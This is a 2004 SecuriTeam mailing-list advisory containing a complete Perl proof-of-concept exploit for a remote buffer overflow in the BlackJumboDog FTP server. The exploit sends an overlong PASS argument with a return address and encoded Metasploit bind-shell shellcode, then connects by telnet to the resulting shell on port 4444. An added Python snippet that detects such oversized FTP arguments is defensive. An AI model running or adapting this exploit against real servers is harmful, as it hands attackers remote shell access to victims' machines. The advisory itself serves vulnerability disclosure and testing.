[EXPL] BlackJumboDog Remote Buffer Overflow Exploit Code
From: SecuriTeam (support_at_securiteam.com)
Date: 08/04/04
To: list@securiteam.com
Date: 4 Aug 2004 23:20:43 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
BlackJumboDog Remote Buffer Overflow Exploit Code
------------------------------------------------------------------------
SUMMARY
A remote buffer overflow was found and reported in our previously featured
article 'BlackJumboDog FTP Server Buffer Overflow'
(http://www.securiteam.com/windowsntfocus/5AP040ADPW.html).
The following proof-of-concept script can help test the vulnerability
against potentially vulnerable servers.
DETAILS
Exploit:
#!/usr/bin/perl
#
# blackJumboDog Exploit code by Tal Zeltzer
#
use strict;
use IO::Socket::INET;
usage() unless(@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);
# win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444
# Size=399 ] http://metasploit.com
my $shellcode =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85".
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19".
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05".
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0".
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74".
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15".
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14".
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53".
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce".
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf".
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb".
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18".
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6".
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16".
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f".
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c".
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18".
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f".
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8".
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e".
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f".
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27".
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2".
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a".
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
my $socket = IO::Socket::INET->new(
    Proto    => 'tcp',
    PeerAddr => $host,
    PeerPort => $port,
);
$socket or die "Cannot connect to host!\n";
print "[+] Connected to host\r\n";
$socket->autoflush(1);
# receive the 220 banner
my $repcode = "220 ";
my $response = recv_reply($socket, $repcode);
# send USER command
my $username = "anonymous";
print $socket "USER $username\r\n";
$repcode = "";
select(undef, undef, undef, 1.002); # sleep about 1 second
# Send PASS command ( Evil Buffer )
# EIP at offset 308
# 7C4E2F60 - jmp ebx in kernel32.dll ( Windows 2000 SP4 )
print "[+] Sending shellcode\r\n";
my $buf = "A" x 308;
$buf .= "\xEB\x06\xEB\x06"; # Jump 6 bytes forward
$buf .= "\x60\x2F\x4E\x7C"; # address of the jmp ebx above, little-endian
$buf .= $shellcode;
print $socket "PASS $buf\r\n";
select(undef, undef, undef, 1.002); # sleep about 1 second
$repcode = "";
recv_reply($socket, $repcode);
close($socket);
system("telnet $host 4444");
exit(0);

sub usage
{
    # print usage information
    print "\nUsage: jumbo.pl <host> <port>\n\n",
          "  <host> - The host to connect to\n",
          "  <port> - The TCP port\n\n";
    exit(1);
}

sub recv_reply
{
    # read reply lines until one carries the expected reply code;
    # an empty code returns after the first line (in Perl an empty
    # pattern would otherwise reuse the last successful match)
    my $socket  = shift;
    my $repcode = shift;
    $socket or die "Can't receive on socket\n";
    my $res = "";
    while (<$socket>)
    {
        $res .= $_;
        last if ($repcode eq "" || /$repcode/);
    }
    return $res;
}
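As an added, defender-side example (not part of the advisory or of the exploit author's code): a small Python check that flags FTP control-channel commands whose argument is abnormally long, contains non-printable bytes, or is dominated by one repeated filler byte, which is the shape of the PASS buffer above; it also covers USER, generalising beyond the single verb the advisory concerns. The sample lines and the per-verb length limits are constructed assumptions.

```python
import re

# Constructed FTP control-channel lines, as a sensor or server log would see
# them (not taken from the advisory). The last line has the shape of the
# advisory's payload: 308 filler bytes, then non-printable jump bytes and an
# address, then shellcode-like bytes.
SAMPLE_LINES = [
    b"USER anonymous\r\n",
    b"PASS guest@example.org\r\n",
    b"USER anonymous\r\n",
    b"PASS " + b"A" * 308 + b"\xeb\x06\xeb\x06\x60\x2f\x4e\x7c" + b"\x90" * 16 + b"\r\n",
]

# Assumed per-site policy: no legitimate argument comes anywhere near the
# 308-byte offset the advisory reports, so alert well below it.
MAX_ARG_LEN = {b"USER": 64, b"PASS": 128}

def inspect_ftp_command(line: bytes, limits=MAX_ARG_LEN) -> dict:
    """Classify one FTP command line and list the reasons it looks like an
    overflow attempt (an empty list means it looks benign)."""
    stripped = line.rstrip(b"\r\n")
    verb, _, arg = stripped.partition(b" ")
    verb = verb.upper()
    reasons = []
    limit = limits.get(verb)
    if limit is not None and len(arg) > limit:
        reasons.append(f"{verb.decode()} argument is {len(arg)} bytes, limit {limit}")
    if any(b < 0x20 or b > 0x7E for b in arg):
        reasons.append("argument contains non-printable bytes")
    run = re.search(rb"(.)\1{63,}", arg)  # 64+ repeats of one byte: filler
    if run:
        reasons.append(f"{len(run.group(0))}-byte run of {run.group(1)!r}")
    return {"verb": verb.decode("ascii", "replace"),
            "arg_len": len(arg), "reasons": reasons}

def find_suspicious(lines):
    """Return (index, report) pairs for every line that raised a reason."""
    hits = []
    for i, line in enumerate(lines):
        report = inspect_ftp_command(line)
        if report["reasons"]:
            hits.append((i, report))
    return hits

if __name__ == "__main__":
    for i, report in find_suspicious(SAMPLE_LINES):
        print(f"line {i}: {report['verb']} ({report['arg_len']} bytes):",
              "; ".join(report["reasons"]))
```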
ADDITIONAL INFORMATION
The information has been provided by Tal Zeltzer of SecuriTeam Experts
(expert@securiteam.com).
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.